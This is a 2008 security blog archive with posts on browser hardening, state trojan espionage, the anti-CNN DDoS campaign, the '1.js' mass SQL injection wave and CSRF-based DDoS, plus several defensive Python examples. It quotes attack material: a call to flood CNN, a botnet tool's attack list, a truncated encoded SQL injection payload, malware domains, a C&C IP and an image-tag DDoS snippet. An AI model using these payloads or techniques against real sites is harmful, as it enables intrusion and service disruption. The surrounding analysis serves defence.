Wednesday

How to secure your browser




Even if you recognize and ignore phishing emails, statistically, sooner or later you will visit an infected website. Previous research has shown that 0.45% of all websites are infected (your mileage may vary). With all the recent drive-by infections, that percentage might have increased. The internet is becoming a bad neighborhood. Email attachments aren't the biggest concern for viruses anymore; it's your browser now. So let's see how to protect ourselves.

Some of my old tips:

  • Run the browser under a non-administrator account or within a sandbox (free tools such as AMUST Defender or Sandboxie).
  • Use a host-based firewall that blocks inbound and outbound connections per application.
  • Patch your system: not only the operating system and browser, but also plug-ins and non-browser applications. Several tools exist that make this assessment easier. One of these tools is the Secunia Software Inspector.
  • Disabling JavaScript might be another very effective method to stop attacks. Most attacks we observed did need JavaScript to be enabled. Disabling JavaScript, however, might not be feasible as it would severely impact the functionality of many legitimate web sites. Some tools address this problem by globally disabling JavaScript, but selectively enabling it for certain trusted sites. NoScript for the Firefox browser is an example of such a tool.
  • Use OpenDNS, as it provides some anti-phishing protection.
  • Don't be mainstream: the tests we conducted show that a simple but effective way to remove yourself as a targeted user is to use a non-mainstream application, such as Opera. As mentioned above, despite the existence of vulnerabilities, this browser didn't seem to be a target.
Let's add the tips from TSSCI Security:
CERT has an excellent document on Securing your web browser! They cover IE, Firefox, and Safari — three secure references for the three most popular browsers.

However — as good as CERT’s guide is, you won’t want to miss our past blog posts on safe/secure browsing, which are stacking up like hot-cakes:

Out of interest, I wanted to have another look at some browser statistics. Diversity is good and Firefox is still my favorite browser. Firefox made some good progress but has stagnated (or stabilized) for the last 6 months. Of course, Firefox 3 might tip the balance a little more. I have tested it and its rendering is really fast. I haven't switched completely since it's still a beta. Pick your favorite poison.

Browser market share per month (Fx = Firefox, Moz = Mozilla, S = Safari, O = Opera):

2008       IE7    IE6    IE5    Fx     Moz    S      O
March      21.9%  30.1%  1.1%   37.0%  1.1%   2.1%   1.4%
February   21.5%  30.7%  1.3%   36.5%  1.2%   2.0%   1.4%
January    21.2%  32.0%  1.5%   36.4%  1.3%   1.9%   1.4%

2007       IE7    IE6    IE5    Fx     Moz    S      O
December   21.0%  33.2%  1.7%   36.3%  1.4%   1.7%   1.4%
November   20.8%  33.6%  1.6%   36.3%  1.2%   1.8%   1.6%
October    20.7%  34.5%  1.5%   36.0%  1.3%   1.7%   1.6%
September  20.8%  34.9%  1.5%   35.4%  1.2%   1.6%   1.5%

Germany caught spying on other countries with Trojans



Let's take a trip back in time. In September, Germany accused China of cyberespionage. Now it seems that Germany was also using Trojans to eavesdrop on the communications of other countries. Its excuse? The war on terror!

Eight months after the nation's chancellor accused China of information attacks, Germany now faces criticism over its intelligence agency's use of software designed to spy on other countries' officials.

The latest incident, which began in June 2006, involved Germany's intelligence agency -- the Bundesnachrichtendienst (BND) -- launching an information attack against the Ministry of Commerce and Industry of Afghanistan, ostensibly an ally, according to media reports. Using a Trojan horse, the intelligence agents were able to read an Afghan government official's e-mail, including his correspondence with a reporter working for the German news magazine Der Spiegel, and data stored on the compromised PC's hard drive. The German Constitution protects the secrecy of telecommunications, but BND's legal counsel concluded that, because the messages were stored communications, they did not fall under the constitutional protection, Der Spiegel reported.

The operation ended in November 2006, when a whistleblower sent a letter to his superiors warning of the surveillance, the magazine reported. In February 2008, an anonymous BND employee notified two members of Germany's parliament of the intelligence agency's wiretapping activities. The incident only recently came to light during a Parliament hearing two weeks ago.

Germany's Interior Minister Wolfgang Schaeuble raised the specter of terrorism during a TV interview to defend the cyber-espionage tactics as necessary. "It's about a few isolated cases," he said, according to an Associated Press report. (Source: Securityfocus)

The article from Der Spiegel mentions some interesting details:
It all began in a small unit in the BND's Division 2. The department is responsible for "technical procurement" -- in other words, obtaining information with technical means, which mainly involves the wiretapping of telecommunications, called "signals intelligence" in industry jargon. In 2006, Division 2 consisted of 13 specialist departments and a management team (Department 20A), employing about 1,000 people. The departments are known by their German acronyms, like MOFA (mobile and operational telecommunications intelligence gathering), FAKT (cable telecommunications intelligence gathering) and OPUS (operational support and wiretapping technology).

In early June 2006, the OPUS team in department 26E launched an intelligence attack against Afghanistan. The details could have been taken from a Hollywood thriller, and the scope of the operation was far greater than has been revealed to date. According to the BND's secret allocation of responsibilities, OPUS is in charge of "technical and operational attacks on IT systems," a more or less accurate description of its agents' work.

So you see, China is not the only country with a cyberintelligence division.


Podcast: AudioParasitics Episode 33 - Part 1 of 2 - Defcon's 'Race to Zero' contest



Episode 33 - Part 1 of 2 - Dave and Jim Discuss Defcon's upcoming 'Race to Zero' contest (Defcon 16), The McAfee S.P.A.M Experiment, and the 2008 RSA conference.

Podcast: Blue Box #78: Cisco IP phone vulnerabilities, WiFi handset insecurity, IETF security-related news, VoIP security news



A new Blue Box episode has been released:

Download the show here (MP3, 17MB) or subscribe to the RSS feed to download the show automatically.


Short Movie: When technology takes over our life

A short movie about what happens when you no longer control your data. A scary future. It makes you think about putting all functions onto one card (payment, identity, car access, house access, ...). It seems so convenient, but...

PS: the end is not suitable for young viewers.



Tuesday

WAFs, PCI and the United Nations SQL injection



Last week, the UN seemed to be among the websites falling victim to the SQL injection attack, and it wasn't their first time. The reason? They never fixed the code and just put a web application firewall in front of it:

One of my early Hackademix posts was about SQL injection vulnerabilities exploited to deface the United Nations main web site. In a later update I explained how, rather than fixing their holes properly, the U.N. technicians deployed a pretty useless Web Application Firewall, masking the most obvious attack surface but keeping their sites just as vulnerable as before.
...

The default search pattern of this tool is inurl:".asp" inurl:"a=": in English, “those web pages developed with Microsoft Active Server Pages technology and accepting query string parameters”. Unsurprisingly, this profile matches the original, still unpatched U.N. SQL injection; as I already said reporting the first accident, I believe crackers primarily target ASP sites (even though they are relatively few nowadays) because of the poor coding standards often shown by ASP coders, who usually have a Visual Basic desktop programming background and are less aware of web application security.

At any rate, some simple googling reveals that some U.N. sites are still infected, while UK Government sites have been “cleaned up”.
The sad truth, though, is that even those “clean” sites are still vulnerable, hence they could be reinfected at any time: some people just never learn… (Source: hackademix.net)


So this reminded me of the PCI DSS 6.6 clarification that was released and sparked some heated discussion about WAFs. I guess a WAF can buy you some time, but it is not a miracle worker. Fix the code!!!


New Variant of Kraken bot on the loose



At the beginning of the month, there was a lot of discussion when a new botnet was discovered that was claimed to be bigger and more dangerous than Storm Worm: the Kraken botnet. But soon afterwards the discussion fell silent, as all attention went back to Storm Worm and its video codec spam wave. So, how is Kraken doing today? Quite well, it seems. Here is some news from ThreatExpert.com:

A new variant of the Kraken/Bobax bot, first seen in the wild on 14th April 2008, seems to be gaining a bit of power: over the last weekend, our ThreatExpert system has received around 50 unique samples of it, and we're still getting them at the same pace - 20-25 new samples a day.

...

In some way, we may call this new feature of the bot an "Artificial English Word Generator", which follows English grammar rules and produces words that look like most other words. For example, compare "confusulent" or "pritation" with something like "ktjptrca".

What is it for? Probably to evade SPAM filters, or any other algorithms that can distinguish a random word by locating weird or uncommon combinations of characters. If no rule or algorithm can be built to distinguish such a word, then it cannot be detected and therefore cannot be blocked.
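To see why a character-statistics filter is the wrong tool against pronounceable generated words, here is an added example (my own illustration, not ThreatExpert's analysis code or anything from the bot) that scores a word by how many of its two-letter pairs occur in a small English reference lexicon. The lexicon is a constructed stand-in for a real dictionary file; the three sample words are the ones quoted above.

```python
import re

# Constructed mini-lexicon of English words used as the reference corpus
# (an assumption of this example; a real filter would load a dictionary file).
LEXICON = {
    "confusion", "confuse", "use", "result", "silent", "present", "station",
    "nation", "operation", "relation", "excellent", "fluent", "consult",
    "pursue", "sure", "culture", "critical", "report", "internet", "account",
}

def bigrams(word):
    """All adjacent two-letter pairs of a word, letters only, lowercased."""
    w = re.sub(r"[^a-z]", "", word.lower())
    return [w[i:i + 2] for i in range(len(w) - 1)]

# Every bigram that occurs anywhere in the lexicon.
KNOWN_BIGRAMS = {bg for term in LEXICON for bg in bigrams(term)}

def bigram_score(word):
    """Fraction of the word's bigrams seen in English-like text.
    Near 1.0 means 'looks pronounceable', near 0.0 means 'looks random'."""
    bgs = bigrams(word)
    if not bgs:
        return 0.0
    return sum(bg in KNOWN_BIGRAMS for bg in bgs) / len(bgs)

def looks_random(word, threshold=0.5):
    """The character-pattern check the generator is built to evade:
    it only fires on words with many unusual letter combinations."""
    return bigram_score(word) < threshold

def in_lexicon(word):
    """Dictionary check: generated words are pronounceable but are not
    English, so a lexicon lookup still separates them from real words."""
    return word.lower() in LEXICON

def classify(word):
    """Verdict a mail filter could act on: 'english', 'random' or 'generated'."""
    if in_lexicon(word):
        return "english"
    if looks_random(word):
        return "random"
    return "generated"

if __name__ == "__main__":
    for sample in ("confusulent", "pritation", "ktjptrca", "station"):
        print(f"{sample:12s} score={bigram_score(sample):.2f} -> {classify(sample)}")
```

The random-looking "ktjptrca" fails the bigram test, but "confusulent" and "pritation" score exactly like the real word "station"; only the dictionary lookup tells them apart, which is the point the write-up makes about this generator.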

The bot constructs an HTTP package with the encrypted contents that is MIME-encoded and is presented as a random MIME-type archive in the HTTP header.

Kraken/Bobax POSTs that HTTP package to its C&C servers (with the pseudo-random URLs), thus making it non-trivial to detect and block such traffic, as not much is left to "hook" in it.

...

As demonstrated above, the new factor of "randomness" in this bot makes it extremely dangerous, considering how serious its effort is in concealing its traffic in order to flow with no obstruction imposed by firewalls.

The backdoor component is left intact in the new variant - its code was copy-and-pasted from the previous variant: the same commands, the same responses.

The SPAM engine and the email collector module are also identical to the previous variant.

VirusTotal.com results are not very good, considering only 9 out of 32 AV scanners (28.12%) can detect this threat, among which only two can actually identify this threat explicitly.

Read the full report.


Monday

Difference between ITIL v3 and ISO 20000



I know ITIL, but I hadn't heard about ISO 20000 before. So let's have a look at it, beginning with the following:

Whitepaper: ITIL® V3 and ISO/IEC 20000 by Jenny Dugmore and Sharon Taylor


This outlines the differences between ITIL V3 and ISO/IEC 20000 from 'the perspective of each clause in the standard where the core 5 ITIL books either do not cover it or cover it differently. It does not cover changes that mean ITIL V3 is closer aligned to ISO/IEC 20000 than was ITIL V2. The table included within this white paper is an ISO/IEC 20000-1 centric document. It identifies clauses where there are notable differences between ISO/IEC 20000 and ITIL V3 that are not simply due to the different purposes of the two sets of documents.'

But isn't there more information on ISO 20000 itself? Well, let's go to ISO 20000 Central:

As described on other pages of this site, ISO 20000 is the international standard for IT Service management.

However, ISO 20000 itself is part of a much bigger picture, in that it aligns with ITIL, the IT Infrastructure Library. This relationship is often illustrated via a diagram such as the one below:

Clearly, however, there is also a relationship with other management protocols and frameworks. This will be explored as additional features are added to this web portal.


Hack.lu 2008 conference coming on the 22nd - 24th of October



There were some rumors that there wouldn't be a new Hack.lu. Luckily, the rumors weren't true: I happened to see this "small" announcement on their website last week.

Announcement:
Yes, there will be a hack.lu 2008. The date will be 22-24 October in Luxembourg. Stay tuned, we are about to assemble the bits and pieces. The CfP will be sent out 1st May. So prepare your submissions.

A three day conference in the center of Europe for bridging ethics and security in computer science.

Hack.lu is an open convention/conference where people can discuss computer security, privacy, information technology and its cultural/technical implications on society. The aim of the convention is to build a bridge between the various actors in the computer security world.

Marked in my calendar. Request to the manager underway.


Sunday

Targeted attacks using Acrobat's pdf and a little new trick



At the beginning of February, a critical security patch for Acrobat Reader was released, and now the vulnerability is being actively used in targeted attacks. Here is an interesting analysis from SANS:

Ever since the end of March, beginning of April, the amount of samples seen in the wild has significantly increased. Interestingly enough, there is almost no "public, widespread" exploitation. All reports are limited to very specific, targeted attacks. However, due to the wide scope of these attacks, and the number of targets we know of, we feel a diary entry was in order. At this point in time, we are receiving more PDF samples from targeted attack victims per day than any other common file type (DOC, CHM, PPT). The threat agents, or attackers, are the same. They are just moving from other file types towards PDF, but are generally using the same control servers and similar backdoor families.

The files contain:
- an embedded trojan installer;
- a clean PDF file.

Once the file is opened in a vulnerable Acrobat Reader version, the backdoor will install, and the clean PDF file is opened in the user's browser. From a user experience, there are two possible methods of detection:

- If the file is opened in a patched Acrobat Reader, an error will be displayed that the file is corrupted;
- If the file is opened in a vulnerable Acrobat Reader, the user will see Acrobat Reader close and immediately reopen the valid PDF document.

Anti virus detection of these samples is usually very low heuristically. The below are detection results from a malicious PDF which had not been reported to an AV vendor yet. Note that these results vary per file.
The closing remarks were even more interesting, because they contained a countermeasure I wasn't aware of.
Acrobat Reader is proving to be an interesting target because users are not very much inclined to upgrade manually. The file format is relatively stable and users of Acrobat Reader 7 may not always feel a need to upgrade.

As such, we strongly recommend that you:

- Ensure your Acrobat Reader installations have been upgraded to version 8.1.2;
- Disable Javascript parsing through Edit>Preferences>Javascript, by disabling the 'Enable Acrobat JavaScript' option.
Read the full analysis @ SANS. Thank you, Maarten.
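Since the SANS advice is to switch off JavaScript in the reader and AV heuristics lag behind, the check a mail gateway or helpdesk can do itself is a quick triage of which active-content features a PDF declares. The following is an added example of my own (not SANS' or Adobe's code): it scans raw PDF bytes for the name objects that auto-run an action (/OpenAction, /AA), carry script (/JavaScript, /JS), launch a program (/Launch) or carry an attachment (/EmbeddedFile). The two PDF byte strings are constructed, minimal and harmless; the verdict labels and thresholds are assumptions of this example.

```python
import re

# Constructed minimal PDF-like files (not real malware): a plain document, and one
# whose catalog has an /OpenAction pointing at a JavaScript action plus an
# attached file, which is the shape the SANS diary describes (dropper + clean PDF).
CLEAN_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

SUSPECT_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >> endobj
4 0 obj << /S /JavaScript /JS (x) >> endobj
5 0 obj << /Type /EmbeddedFile /Length 4 >> stream
MZ..
endstream endobj
trailer << /Root 1 0 R >>
%%EOF
"""

# PDF name objects worth a second look: /OpenAction and /AA run an action
# automatically, /JavaScript and /JS carry script, /Launch starts an external
# program, /EmbeddedFile carries an attached file.
RISKY_NAMES = [b"/OpenAction", b"/AA", b"/JavaScript", b"/JS", b"/Launch", b"/EmbeddedFile"]

def is_pdf(data):
    """PDF files start with the %PDF- header."""
    return data[:5] == b"%PDF-"

def risky_features(data):
    """Return {name: count} for every risky name present in the raw bytes."""
    found = {}
    for name in RISKY_NAMES:
        # require a delimiter after the name so /JS does not also match /JSX
        count = len(re.findall(re.escape(name) + rb"(?![A-Za-z0-9_])", data))
        if count:
            found[name.decode()] = count
    return found

def triage(data):
    """Verdict: 'not-pdf', 'clean', 'review' (some active content) or
    'quarantine' (an auto-run trigger combined with script or an attachment)."""
    if not is_pdf(data):
        return "not-pdf"
    feats = risky_features(data)
    if not feats:
        return "clean"
    auto_run = "/OpenAction" in feats or "/AA" in feats
    payload = any(k in feats for k in ("/JavaScript", "/JS", "/Launch", "/EmbeddedFile"))
    return "quarantine" if auto_run and payload else "review"

if __name__ == "__main__":
    for label, blob in (("clean", CLEAN_PDF), ("suspect", SUSPECT_PDF)):
        print(label, triage(blob), risky_features(blob))
```

This catches only names written in the plain form; PDF allows names to be hex-escaped (for example /J#53) and objects to sit inside compressed object streams, so a scan like this is a first filter, not a replacement for a real PDF parser or for keeping the reader patched.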


Why right brain people will take over the world



I used to consider myself a 'leftie': a logical and analytical person with not much (need for) creativity. Most educational institutions offer either exact sciences or creative curricula, and the content is quite separated.
You seldom see any courses about creativity or creative thinking when studying exact sciences, which is a pity. Even if you are not a natural talent in either discipline, with some 'training' you could master the basics. They are not (or shouldn't be) mutually exclusive. Even in IT or engineering, some creativity can help you to think 'outside of the box' and come to solutions which you wouldn't be able to find using only logic. I also consider creativity an essential skill for good presentations. This was my epiphany of the last year.

You could also consider 'hacking' a creative process: thinking about how to use technology in a way other than everyone else is using it. So start using that other half of your brain!!!

My friend Karim started an interesting discussion about "The Beginner's mind".

Most of us have lost these abilities when growing up. We’ve put the creative aspect away for only artists to use. Yet everyone should be the artist in their own line of work.

You may say that there is nothing creative about working in a regular business. But do you think that if there was no creativity within a business, that it could become innovative or differentiate itself within a given sector?

Within the zen teaching one often speaks of the “beginner’s mind” (or child’s mind). One who approaches life with a beginner’s mind is fresh, enthusiastic and open to a wide range of ideas. When one does not know what’s possible, one will be open to exploration/discovery. Unburdened by your fixed views/habits/…, one will see things more clearly.

Read his full post.

If you are interested in this topic, I can recommend the following book: A Whole New Mind: Why Right-Brainers Will Rule the Future.


The future belongs to a different kind of person with a different kind of mind: artists, inventors, storytellers-creative and holistic "right-brain" thinkers whose abilities mark the fault line between who gets ahead and who doesn't. Drawing on research from around the world, Pink outlines the six fundamentally human abilities that are absolute essentials for professional success and personal fulfillment-and reveals how to master them. A Whole New Mind takes readers to a daring new place, and a provocative and necessary new way of thinking about a future that's already here.

Updated with a part from Seth Godin: Really Bad PowerPoint Design:

Communication is the transfer of emotion.

Communication is about getting others to adopt your point of view, to help them understand why you’re excited (or sad, or optimistic or whatever else you are.) If all you want to do is create a file of facts and figures, then cancel the meeting and send in a report.

Our brains have two sides. The right side is emotional, musical and moody. The left side is focused on dexterity, facts and hard data. When you show up to give a presentation, people want to use both parts of their brain. So they use the right side to judge the way you talk, the way you dress and your body language. Often, people come to a conclusion about your presentation by the time you’re on the second slide. After that, it’s often too late for your bullet points to do you much good.

You can wreck a communication process with lousy logic or unsupported facts, but you can’t complete it without emotion. Logic is not enough.


Friday

Chinese attackers might have another go at CNN: another planned attack on the 25th at 8pm (UPDATED)



Kudos to TheDarkVisitor for reporting this, even if it's not confirmed.

At 8:00 pm (Beijing local) on 25 April, Chinese hackers will attack CNN

[Announcement] 2008-04-21 On 25 April, 8:00 pm (Beijing local), Chinese hackers will attack CNN.

Everyone, please pay attention to the issues regarding the effort to invade the CNN website. We are requesting the support of all Chinese. If you are an expert hacker, we request you ardently strive to invade www.cnn.com. If you are a novice, we request you use DDOS flood attack or put up a couple of pieces of hacker software. If you are not a hacker, we request that you land on the www.cnn.com website at 8:00 pm on 25 April.

Try with all your might to establish a link with the website in order to waste its resources. If their website is continually at capacity for three hours, the server may just crash. Don’t forget, there are over 1.4 billion Chinese! There are over 100 million Chinese online, they won’t be able to withstand us

Please, assist us with the invasion of www.cnn.com, this represents the honor of China over the issue of Tibetan independence. The www.cnn.com website has put out a large amount of unsubstantiated reports that are a serious challenge and US hackers have already invaded many of our websites. It is time for revenge; let us begin a new round of Sino-US hacker wars. Let them know the strength of the Chinese people. (TheDarkVisitor)

And the way they will do it is very simple: by just asking people to surf to a website. Jeremiah was referencing this kind of attack a few days ago, and this is the real-world example.

Once again, you land on the webpage above and it begins refreshing the CNN website in an iFrame every five seconds using up their bandwidth (Jumper explained this to me). So, I sort of attacked CNN another five,six, seven…forty times looking at the program. Here is Jumper’s full explanation from the question I e-mailed to him last night about the site:
Yes. It loads an iframe: And then it reloads itself every five seconds:

(TheDarkVisitor)

I don't know what they are hoping to accomplish, as this attack can be easily avoided in the same way as before: filtering or blocking certain Chinese netblocks.

BUT if someone were to throw in a botnet or two, that is another matter. And it seems they have released the tools just for the occasion: NetBot Attacker Anti-CNN Tool (Arbor Networks):

As I noted last night, another, third tool (that I know of) dedicated for Chinese who are upset and want to attack CNN has been released. The folks at Hackeroo have released a Netbot Attacker Anti-CNN version, free of charge, for folks to use. Normally Netbot Attacker is a commercial tool, but this is a focused version.

Netbot Attacker provides a simple Windows UI for controlling a botnet, reporting and managing the network, and commanding attacks. So far nothing special or new there. It ships as a simple RAR file with two pieces: an INI file (see below, partially edited and obscured) and a simple EXE.

...

A rough translation - provided with the bot - would be:

Common Attack:
SYN Flood ICMP Flood UDP Flood UDP Small TCP Flood TCP Mult-Connect
Web Attack :
NoCache Get Flood CC Attack Http GET Nothing
Special Attack:
CQ Game Attack Route Attack Smart Auto Attack
Combine Attack:
SYN+UDP Flood IACMP +TCP Flood UDP Small+TCP Connect

Note that there’s no mention to the average user that they’ll be able to access your PC now that you’re helping the cause.

It is unclear to me how much this specific tool is used compared to the others. In the end, the effect is the same, however, which is to try and drive an adversary offline with a packet flood.

Read the full analysis from Jose Nazario here, including screenshots.

The attack might go ahead in the next few hours. Time to keep an eye on those Netcraft statistics. More news to follow.

By the way, apparently there was a third victim in this whole affair: Slideshare.net also suffered a major DDoS, peaking at 2.5 GBps, last week.


UPDATE (25/04/2008): Either the attack has yet to really start, or CNN is taking it really well. The funny thing is that, looking at the Netcraft statistics, we only see some performance drops measured from Italy. There were some spikes (response times) on that graph. During the last attack, we saw spikes on all of the graphs.





Followup on the 1.js sql injection wave



It seems that the number of infected pages has climbed to 510,000 (Source: F-Secure). Looking at the Belgian pages, the count has grown to 369 infected (injected) sites.

As more and more websites are using database back-ends to make them faster and more dynamic, it also means that it's crucial to verify what information gets stored in or requested from those databases — especially if you allow users to upload content themselves which happens all the time in discussion forums, blogs, feedback forms, et cetera.

Unless that data is sanitized before it gets saved you can't control what the website will show to the users. This is what SQL injection is all about, exploiting weaknesses in these controls. In this case the injection code starts off like this (note, this is not the complete code):

DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x440045004300
4C00410052004500200040005400200076006100720063006800610072
00280032003500350029002C0040004300200076006100720063006800
610072002800320035003500290020004400450043004C004100520045
0020005400610062006C0065005F0043007500720073006F0072002000
43005500520053004F005200200046004F0052002000730065006C0065
0063007400200061002E006E0061006D0065002C0062002E006E006100
6D0065002000660072006F006D0020007300790073006F0062006A0065
00630074007300200061002C0073007900730063006F006C0075006D00
6E00730020006200200077006800650072006500200061002E00690064
003D0062002E0069006400200061006E006400200061002E0078007400
7900700065003D00270075002700200061006E0064002000280062002E
00780074007900700065003D003900390020006F007200200062002E00
780074007900700065003D003300350020006…

Which when decoded becomes:

DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor
CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b
where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35
or b…

What happens as a result? It finds all text fields in the database and adds a link to malicious javascript to each and every one of them which will make your website display them automatically. So essentially what happened was that the attackers looked for ASP or ASPX pages containing any type of querystring (a dynamic value such as an article ID, product ID, et cetera) parameter and tried to use that to upload their SQL injection code.

So far three different domains have been used to host the malicious content — nmidahena.com, aspder.com and nihaorr1.com. There's a set of files that gets loaded from these sites that attempts to use different exploits to install an online gaming trojan. Right now the initial exploit page on all domains are unaccessible but that could change. So if you're a firewall administrator we recommend you to block access to them. (Source: F-Secure)
Input validation, people!!! Check out the OWASP Top Ten. SQL injection is back at spot nr. 2.
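Both the U.N. story above (a WAF in front of unfixed code) and this wave come down to one coding pattern: a query-string value pasted into the SQL text. As an added example of my own (not code from any of the sites involved), here is that pattern next to the fix, using an in-memory SQLite table standing in for the article database behind such an ASP page. The table, the rows and the function names are constructed for the example.

```python
import sqlite3

def build_db():
    """Constructed sample catalogue: an 'articles' table like the ones behind
    the ASP pages mentioned above, with one row that must never be served."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (id INTEGER, title TEXT, published INTEGER)")
    conn.executemany("INSERT INTO articles VALUES (?, ?, ?)", [
        (1, "Public article", 1),
        (2, "Another public article", 1),
        (3, "Unpublished draft", 0),
    ])
    return conn

def lookup_vulnerable(conn, article_id):
    """The pattern the injection wave relied on: the query-string value is
    concatenated into the SQL text, so the value can change the query itself.
    (Kept deliberately vulnerable to show the failure; do not copy.)"""
    sql = ("SELECT title FROM articles WHERE published = 1 AND id = "
           + article_id + " ORDER BY id")
    return [row[0] for row in conn.execute(sql)]

def lookup_safe(conn, article_id):
    """The fix: validate the parameter's type first, then bind it as data
    through a placeholder, never as part of the SQL text."""
    if not article_id.isdigit():
        raise ValueError("article id must be a positive integer")
    sql = "SELECT title FROM articles WHERE published = 1 AND id = ? ORDER BY id"
    return [row[0] for row in conn.execute(sql, (int(article_id),))]

if __name__ == "__main__":
    conn = build_db()
    print("normal request   :", lookup_vulnerable(conn, "1"), lookup_safe(conn, "1"))
    print("tampered, unsafe :", lookup_vulnerable(conn, "3 OR 1=1"))
    try:
        lookup_safe(conn, "3 OR 1=1")
    except ValueError as exc:
        print("tampered, safe   : rejected,", exc)
```

The concatenating version returns the unpublished row as soon as the parameter carries anything but a number; the parameterized version rejects it before the database ever sees it. A WAF only sees the request surface; the placeholder fixes the query.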

UPDATE (25/04/2008): SANS ISC is also giving some more details:

The crew over at Shadowserver has published additional information related to SQL injected sites. They included the botnet controller's IP address 61.188.39.214 and a content-based Snort signature for the bot control traffic that is not IP dependent. The bot controller is alive and communicating on port 2034 with some infected clients at this time.
http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080424
http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080313

They have hit city websites, commercial sites and even government websites. This type of injection pretty much nulls and voids the concept of “trusted website” or "safe sites".

The Register covered it, stating their search returned 173k injected results:
http://www.theregister.co.uk/2008/04/24/mass_web_attack/
The number I received doing the same search was 226k. Those are not all unique websites. Many sites got hit more than once.

Lou, a self-described “accidental techie”, has been discussing it as they have been reinjecting this into his database/website “every other day”. http://www.experts-exchange.com/Database/MySQL/Q_23337211.html

Another Zero Day in Quicktime



Beware of opening QuickTime movies!!!

US-CERT is aware of a public report of a new vulnerability in Apple QuickTime. The report indicates that if a user opens a specially crafted QuickTime file, an attacker may be able to execute arbitrary code. This vulnerability may have several attack vectors, such as visiting a malicious or compromised website. US-CERT is currently investigating this report and will provide additional details as needed.

US-CERT encourages users to use caution when opening QuickTime files, and apply the best security practices described in the Securing Your Web Browser document, to help mitigate the risks. (Source: US CERT)
There is no patch as we speak, so be careful. How many more of these security holes will we see in QuickTime?

UPDATE: The (original) GNUCITIZEN article, with a movie of the exploit.


Thursday

Airport Security: All your data are belong to us



If you recently took a plane from Schiphol airport (Amsterdam), it is possible that the data on your mobile phone, laptop, USB sticks or other media was copied and "searched". The reason: a search for the distribution of child porn. (Source: security.nl)

It was only a pilot project, because passengers are alleged to transport such material physically out of fear of detection on the internet. Especially tourists who had been to Thailand, Brazil, Sri Lanka and Vietnam were under scrutiny.

The border police didn't say what the search criteria were, but they confirmed that laptops, digital cameras and CD-ROMs were inspected.

I already knew that they did these 'digital' searches at the US borders. It seems to be spreading to other countries now. At least they didn't use the terrorism wildcard.

I don't condone child porn at all, but this practice has consequences. I have signed NDAs with my clients and I have a contractual and legal obligation not to disclose their information. I probably cannot refuse these kinds of searches, which puts me between a rock and a hard place.

The only alternative is that I can only travel with a cleanly installed laptop and use a (SSL) VPN to access my data. But with the prices of hotspots (in hotels), that's a pricey way of working.

This is so easy to circumvent. Just solder an USB flash chip to the PCB of your laptop and make it look a part of the laptop. It's of course not electronically connected and I doubt that they will disassemble the laptop and inspect it. Afterwards, remove and resolder the chip back onto the pendrive PCB. Maybe not the best example but these things are so small, that they seem easy to hide.

Does your IT staff have spare laptops ready for your travelers? Do you have a security policy that takes this into account? These kinds of search practices have a major impact on the protection of our confidential information and the way our mobile users work.

Wanted: experts on security issues of OS virtualization technologies



ISSA-BE has received a request from Dr. Trimintzios from ENISA to support them in investigating security issues of OS virtualization technologies.

ENISA is planning to establish a Virtual Expert Group (no physical meetings required) to study the Security issues in Operating System Virtualisation Technologies. The work of the group is expected to result in a position paper which will be published by ENISA, while all the members selected for the group will be designated as co-authors.
The paper is aimed at end users of these technologies, policy and decision makers. I would like to ask you for your help in identifying experts for this new group.

Please inform anyone within or outside your organisation who has expertise on this topic and who would be interested in participating. Obviously, if you feel you have the relevant expertise, please propose yourself. The detailed Terms of Reference for the Virtual Group and the ENISA position paper on security issues in OS virtualization technologies are available here.

For applications and further information please contact Dr. Simone BALBONI. Please note that we expect the paper to make a considerable impact in the press.
So if you have some expertise in this area, any help would be appreciated.

I don't need a botnet, just me and some friends with CSRF DDoS



Jeremiah started a discussion about CSRF DDoS and why it could become a real threat.

It’s with this context in mind that I share my thoughts about DDoS attacks carried out by way of CSRF. Also, I take no credit for the novelty of this attack as it’s been rumored around in various circles for years. I’m merely drawing attention to the issue. Here’s the basic exploit code that a bad guy would need:

<IMG SRC="http://victim/">

Simple enough? All the bad guy needs to do is post the HTML snippet to a large number of public websites where other users would come in contact with it. These websites could be message boards, guest books, WebMail, blog comments, social networks, chat rooms, and so on. All types of websites that are quite popular, free to sign up, and easy to automate (save for CAPTCHA). The code instructs a user's browser to make an HTTP request to an arbitrary location (victim) invisibly and behind the scenes, with connections originating from all over. This makes the attack difficult to stop, and obviously the more frequented the websites are, the more effective it is. (Source: Jeremiahgrossman)
Well, this might just be a theoretical attack or is it? I remembered Dancho Danchev posting the following piece (about the CNN attack):
What if a simple script that is automatically refreshing CNN.com multiple times in several IFRAME windows gets embedded at thousands of sites, and then promoted at hundreds of forums, with a single line stating that "If you're a patriot, forward this to all your friends"? Now, what if this gets coordinated to happen at a particular moment in time? This is perhaps the most realistic scenario to what exactly happened with CNN.com, and the data speaks for itself; in fact I can easily state that the bandwidth generated by this massive PSYOPs campaign is greater than the one used by a botnet that's also been DDoS-ing CNN.com.

All of these sites are basically refreshing CNN.com every couple of seconds, thereby wasting the site's bandwidth. The only flaw of this attack approach compared to a botnet is that all the participating hosts are Chinese, and therefore, as NetCraft pointed out, CNN blocked access to certain countries, China for instance. (Source: ddanchev)
CSDDoS is just a term suggested in one of the comments on Jeremiah's post. Great, another IT acronym for the dictionary! ;-)

Reading the text above, the attack doesn't sound so theoretical anymore.

So, how long before blocking large netblocks like China won't work anymore?

Another interesting read is the Puppetnets (Misusing Web Browsers as a Distributed Attack Infrastructure) paper from the "Systems and Security Department, Institute for Infocomm Research, Singapore":

ABSTRACT
Most of the recent work on Web security focuses on preventing attacks that directly harm the browser’s host machine and user. In this paper we attempt to quantify the threat of browsers being indirectly misused for attacking third parties.
